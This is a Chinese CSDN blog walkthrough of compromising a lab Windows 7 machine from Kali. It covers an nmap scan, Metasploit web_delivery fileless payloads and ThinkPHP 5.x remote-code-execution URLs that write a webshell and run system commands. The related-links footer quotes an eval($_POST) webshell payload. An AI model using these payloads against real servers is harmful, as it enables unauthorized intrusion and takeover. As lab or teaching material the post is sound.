目标攻击漏洞获取目标机器最高权限

最新推荐文章于 2023-10-18 08:43:05 发布
最新推荐文章于 2023-10-18 08:43:05 发布
阅读量1.6k 收藏 3
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjxsir/article/details/111512984
版权

目标攻击漏洞获取目标机器最高权限

目标站点

target: win7x64 192.168.123.1 60[DHCP]

attack: kali-linux 192.168.123.136

方法一:通过web站点,使用无文件的方式攻去利用执行

方法二:通过web站点, 上传webshell,返回給msf

方法三:攻击其他端口服务,拿到meterpreterc

信息收集总在前- nmap端口扫描

root@kali:~# nmap -sV -T4 192.168.123.160

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-17 15:20 CST

Nmap scan report for 192.168.123.160

Host is up (0.00057s latency).

Not shown: 988 closed ports

PORTSTATE SERVICEVERSION

80/tcpopen http

Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j mod fcgid/2.3.9)

135/tcp open msrpcMicrosoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft- ds (workgroup: WORKGROUP)3306/tcp open mysqlMySQL (unauthorized)

MAC Address: 00:0C:29:7C:DA:E3 (VMware)

Service Info: Host: USER-20181210Fl; OS: Windows; CРE: cpe:/o:microsoft:windows

方法一

➢访问web站点,寻找漏洞点

http://192.168.1 23.160/dvwa/vulnerabilities/exec/#

➢如何利用?

当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web. delivery就派上用场。web delivery的主要目的是快速和受害者主机建立一条session。 当受害者主机存在比如命令注入、远程命令执行等问题时.攻击者可以使用web delivery生成的一条命令建立连接。

另外web_ delivery的payload不会在受害者主机磁盘上写文件,而是直接将攻击者服务器上的代码加载到内存执行,有利于绕过检测。

web delivery支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过settarget 0或1或2来设置是使用php还是python还是powershel等。

方法二

➢访问web站点,寻找漏洞点http://192.168.123.160/html/public/

使用ThinkPHP V5.1软件

➢如何利用-写入webshell

http://192.168.123.160/html/public/index.php?

s=indexNthink\template\driver\file/write&.cacheFile= phpinfo.php&content= %3C?php%20phpinfo();?%3E

➢如何利用-连接webshell-.上传后门文件

在这里插入图片描述

➢找到漏洞利用点

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本)远程命令执行漏洞利用(GetShell)

http://192.168.123.160/html/public/index.php?s= /index/\think\app/invokefunction&function=call user func_ array&vars[0]=system&vars[1][=whoami

http://192.168.123.160/html/public/index. php?s= /index/\think\request/cache&key= whoamilsystem
请不要干坏事哦~~

白玉瑕
关注
MSF之攻击web站点漏洞获取目标机器最高权限
世间繁华梦一出
12-22 2435
利用MSF攻击web站点的漏洞获取最高权限方法一:通过web站点,使用无文件的方式攻击利用执行方法二:通过web站点,上传webshell(msfvenom后门木马),返回给msf方法三:攻击其他端口服务,拿到meterpreter 方法一:通过web站点,使用无文件的方式攻击利用执行 如何利用? 这里介绍一个msf的新模块web_delivery 当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场了。 web_delivery的主要目的是快速和受害者
利用 ARM 核间调试漏洞获得 SoC 硬件最高权限(上)
niuchuangxinan的博客
02-07 1261
Nailgun Attack 攻击原理和攻击步骤
内网渗透 -- 获取内网中其他主机权限
weixin_41489908的博客
07-04 2397
每天早上醒来你有两个选择:一是盖上被子继续做你没做完的梦,二是掀开被子去完成你未完成的梦。。。 ---- 网易云热评 环境:小攻:Kali 2020,ip:192.168.1.133 小受:win7 x86,ip:192.168.1.144 小小受:win7 x64 ,ip: 192.168.1.130 一、生成木马及监听主机参考上篇文章: 二、获取小受的IP地址 meterpreter > getsystem ...
测试xss如何获得目标机器系统权限
weixin_34221112的博客
06-24 634
author:RootkitHat.Org 有装B的嫌疑,但是你如何得知你的目标用什么系统和什么浏览器 相似的工具这里有一个:http://xss-proxy.sourceforge.net 附件: Parh /sploits/2011/06/XSSF.zip 解压后吧附件全部复制到 /msf3/里面 启动metasploit ,创建数据库,并且载入插件 ...
OpenSSL安全特征问题漏洞(CVE-2022-2068)版本1.0.2k-fips升级到3.0.5
weixin_45618691的博客
10-10 4988
openssl漏洞修复
Meterpreter内网穿透
快吃小蛋糕吧的博客
11-06 3376
本文转载自https://www.freebuf.com/articles/network/125278.html 本文实操部分均为本人复现 纵深防御也被被称之为“多层防御”,这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险,在其中有些电脑被入侵或是泄密时,风险可以大大降低。举例来说,防毒软件被安装于个人工作站上,电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。 何谓路由 确定设备如.
Vulnstack 红队(一)
菜鸟的学习笔记
06-02 8295
Vulnstack 红队(一) 靶机为红日安全分享的靶机 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 笔记参考资料如下: CSDN——谢公子 FreeBuf——红日安全团队专栏 CSDN——assless 序 本次网络环境为两个虚拟网络。 192.168.72.0/24为模拟公网环境。(Vmnet2) 192.168.52.0/24为模拟内网环境。(Vmnet1) 攻击机器与win7的第一张网卡处于Vmnet1。(模拟公网) win7的
深度神经网络的目标化木马攻击方法及其实验验证
113198TBT:使用BitT rojan的目标神经网络攻击Adnan Siraj Rakin,Zhezhi He和Deliang Fan电气,计算机和能源工程学院,亚利桑那州立大学,坦佩,AZ 85287dfan@asu.edu摘要现代深度神经网络(DNN)的安全性受到严格...
Windows系统近年漏洞概况及攻击教程防御
qq_55163354的博客
08-05 3594
参考:《2018年Windows平台漏洞年度报告》 什么是漏洞漏洞是在硬软件,协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。例如OpenSSL心脏出血漏洞,Badlock Bug,Stagefright等。 漏洞危害: 从小方面来讲,漏洞曝光后被不法使用会危害个人用户的隐私安全与财产安全。从大方面来讲,一些漏洞就是在网络方面的战略武器。(所以有自己国家的设备系统,芯片等真的很重要。国外有很多先例,我们可以作参考,但核心的东西必须自己有) 具体
OpenSSH 代码问题漏洞(CVE-2023-38408)升级到最新版
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
10-16 2906
其中,ssh-agent是一个后台程序,可缓存用于SSH公钥身份验证的私钥,通过跟踪用户的身份密钥和密码来简化用户身份验证过程。一旦这些密钥存储在ssh-agent中,它就允许用户访问其他服务器,而无需重新输入密码或密码,从而提供流畅的单点登录(SSO)体验,从而减少常规密码输入的需要。通过Openssh配置(sshd_config)、防火墙,安全组ACL等限制来源访问IP为白名单仅可信IP地址,同时,非必要,关闭SSH代理转发功能,禁止在有关主机启用ssh隧道等。,或升级到9.4p1或9.5p1版本;
Thinkphp历史漏洞复现
懂进攻知防守
07-26 1940
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms(内容管理系统)就是基于 thinkphp 二次开发的,如果 thinkphp 出现问题,会影响很多基于 thinkphp 开发的网站。 ...
Openssl漏洞问题升级为1.0.1g(OpenSSL 漏洞版本v1.0.1到1.0.1f)
TURING.DT
04-13 4687
OpenSSL v1.0.1到1.0.1f的密码算法库中发现了一个非常严重bug(不在版本内的不存在漏洞),该bug允许攻击者读取存在bug的系统的64kb处理内存,暴露加密流量的密钥,用户的名字和密码,及访问的内容。 查看版本: root@***# openssl version -a 1.安装相关依赖 root@***@:~# yum install zlib1g zlib1g
openssl 版本_漏洞通告 | OpenSSL 拒绝服务漏洞(CVE20201971)
weixin_39779530的博客
12-22 1525
漏洞背景2020年12月08日,OpenSSL官方发布安全公告,披露CVE-2020-1971 OpenSSL GENERAL_NAME_cmp拒绝服务漏洞。OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。漏洞描述2020年12月08日,OpenSSL官方发布安全公告,披露CVE...
漏洞复现过程步骤
最新发布
qq_74247740的博客
10-18 210
影响版本:Microsoft Windows Vista SP2,Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1,Windows Server 2012 Gold和R2,Windows RT 8.1,Windows 10 Gold,1511和1607,Windows Server 2016。端口版本:Windows Server 2008 R2 standard 7600 Microsoft-ds。端口:445端口 smb文件共享服务。
渗透测试-[windows-MS08-067、MS10-046、MS17-010、MS12-020]
m0_43405474的博客
05-05 3081
【MS漏洞攻击实验-MS08-067、MS10-046、MS17-010、MS-12-020】0.实验环境1.MS08-067【RPC】1.1 漏洞描述1.2 主机发现1.3 利用MSF通过ms08-067漏洞渗透目标系统1.4 后渗透利用1.查看权限:2.Shell3.添加账号4.将新账号添加到管理员组中5.截屏2.MS10-046【快捷方式自动执行代码】2.1 漏洞描述2.2 渗透攻击2.3 后渗透利用3.MS17-010【SMB】3.1 漏洞描述3.2 渗透攻击3.2.1 目标发现3.2.2 渗透攻击
永恒之蓝(CVE-2017-0146)复现(超详细)
轻舟已过万重山
09-21 5537
大家好,这是我来到CSDN创作的第二篇博客,我在进行实战模拟时跟大家一样,找到的教程,资料都是参差不齐,要么文章含金量不高,要么不详细,跳过了很多步骤,导致我们在实战复现的过程中,遭遇了各种各样的阻碍,但是我们在搜索相关报错信息时又找不到资料,整个安全圈的技术属于只对圈内开放,难住了很多想要入门的小伙伴,所以在此之后,我会将我自己的学习路线和每次实战的思路,以及遇到的问题,都写成博客,希望能够帮到大家,也希望有大神来指导指导我,大家一起共同进步。
OpenSSL发布了2个高危漏洞的补丁程序
w3cschools的博客
03-29 468
OpenSSL的维护者已经发布了针对其软件中的两个高度严重的安全漏洞的修复程序,该漏洞可被利用来进行拒绝服务(DoS)攻击并绕过证书验证。 跟踪为CVE-2021-3449和CVE-2021-3450,这两个漏洞已在周四发布的更新程序(OpenSSL 1.1.1k版)中得到解决。虽然CVE-2021-3449影响所有OpenSSL 1.1.1版本,但CVE-2021-3450影响OpenSSL版本1.1.1h及更高版本。 OpenSSL是一个由加密功能组成的软件库,这些加密功能实现了传输层安全协议,
云计算|OpenStack|使用VMware安装华为云的R006版CNA和VRM---初始安装(一)
zsk_john的技术分享专用博客
02-22 4963
前言: FusionCompute架构 (CNA、VRM) CNA(ComputingNode Agent):计算节点代理 VNA虚拟节点代理,部署在CNA上,实施计算、存储、网络的虚拟化的配置管理。 VRM(Virtual Resource Manager):虚拟资源管理器
thinkPHP远程代码执行漏洞
weixin_30265171的博客
03-18 918
1.thinkphp5.1版本 2.payload index.php?s=index/\think\template\driver\file/write&cacheFile=1.php&content=<?php @eval($_POST['jmc']);?> cacheFile=文件名 content=一句话 直接访问,出现空白说明操作成功。 ...
利用粘滞键漏洞获取管理员权限的技巧
"粘滞键漏洞是Windows操作系统中...粘滞键漏洞是一种严重的安全威胁,它利用了Windows系统设计的一个特性,给不法分子提供了获取管理员权限的捷径。用户和管理员都应当提高警惕,采取适当的措施保护系统免受此类攻击
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值